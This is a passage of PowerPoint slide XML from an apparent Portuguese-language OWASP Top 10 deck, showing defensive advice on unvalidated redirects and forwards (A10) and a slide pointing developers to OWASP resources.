                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para o usuário.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Recomenda-se que qualquer parâmetro de destino seja um valor mapeado, e não a URL real ou parte dela, e que o código do lado do servidor traduza este mapeamento para a URL de destino.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Aplicações podem usar ESAPI para substituir o método </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>sendRedirect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para certificarem-se de que todos os destinos do redirecionamento são seguros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evitar tais falhas é extremamente importante já que elas são o alvo favorito de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tentando obter a confiança do usuário.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirecionamentos e Encaminhamentos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inválidos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="-76199" y="1014414"/>
            <a:ext cx="6761162" cy="520458"/>
            <a:chOff x="-76388" y="1014596"/>
            <a:chExt cx="6761516" cy="520295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 28"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="-76388" y="1014596"/>
              <a:ext cx="6761516" cy="520295"/>
              <a:chOff x="-76388" y="997424"/>
              <a:chExt cx="6761516" cy="520295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879691" y="1073600"/>
                <a:ext cx="1020816" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnerabilidades</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>        de Segurança</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="37" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="145" y="1344"/>
                  <a:ext cx="190" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050" algn="ctr">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>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48" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>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49" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>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65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1633"/>
                  <a:ext cx="288" cy="0"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1309572" y="1078361"/>
                <a:ext cx="838244" cy="357076"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 20889"/>
                  <a:gd name="adj2" fmla="val 24667"/>
                  <a:gd name="adj3" fmla="val 34667"/>
                  <a:gd name="adj4" fmla="val 8013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Vetores </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> de Ataque</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800666" y="1049795"/>
                <a:ext cx="685836" cy="428491"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 250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Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>  Técnicos</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="761855" y="1262453"/>
                <a:ext cx="535016" cy="1588"/>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41" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2189093" y="1262453"/>
                <a:ext cx="630270" cy="1588"/>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42" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="3"/>
                <a:endCxn id="39" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3900507" y="1264041"/>
                <a:ext cx="900159"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sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-76388" y="1322855"/>
                <a:ext cx="1143060" cy="194864"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Agentes </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>de </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Ameaça</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923088" y="1073600"/>
                <a:ext cx="762040" cy="380881"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impactos</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="pt-BR" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>no Negócio</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="45" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="4"/>
                <a:endCxn id="44" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486502" y="1264041"/>
                <a:ext cx="436586"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
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879691" y="1090772"/>
              <a:ext cx="220675" cy="380881"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>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endParaRPr lang="pt-BR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2862228" y="1235189"/>
              <a:ext cx="109543" cy="9522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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="964189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921512114"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8348192"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="589889">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Estabelecer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Usar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Processos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de Segurança Consistentes  e Controles de Segurança Padronizados</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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chemeClr val="accent4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="77583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000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Se a segurança de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>aplicações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de web é um tema novo para você,  ou mesmo que já esteja bem familiarizado com esses riscos, a tarefa de criar uma aplicação web segura ou corrigir uma aplicação web que já existe pode ser bastante difícil. Se você gerencia um portfolio de aplicações de tamanho considerável, isso pode ser intimidante. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="8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sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Para ajudar </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>organizações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e desenvolvedores a reduzir os riscos de segurança de suas aplicações de uma forma econômica, o OWASP criou vários recursos </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>livres e abertos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> que podem ser usados visando a segurança de aplicações na sua empresa. A seguir se encontram alguns dos muitos recursos que o OWASP criou para ajudar organizações a produzir  aplicações web seguras. Na página seguinte apresentamos recursos adicionais do OWASP que podem ajudar  a verificar a segurança das aplicações.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR"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pt-BR" sz="1000" baseline="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sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Numerosos recursos adicionais do OWASP estão disponíveis. Visite a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Página de Projetos OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, lá estão listados todos os projetos OWASP, organizados por tipo de versão dos projetos (Release Quality, Beta, ou Alfa). A maioria dos recursos OWASP está disponível na página de  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, e muitos documentos do OWASP podem ser solicitados em formato </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Impresso ou eBook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="76199"/>
            <a:ext cx="5562600" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Próximos Passos para Desenvolvedores</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>+D</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2971800"/>
            <a:ext cx="8763000" cy="5076645"/>
            <a:chOff x="-914400" y="2971800"/>
            <a:chExt cx="8763000" cy="5076645"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="2971800"/>
              <a:ext cx="8763000" cy="5029200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
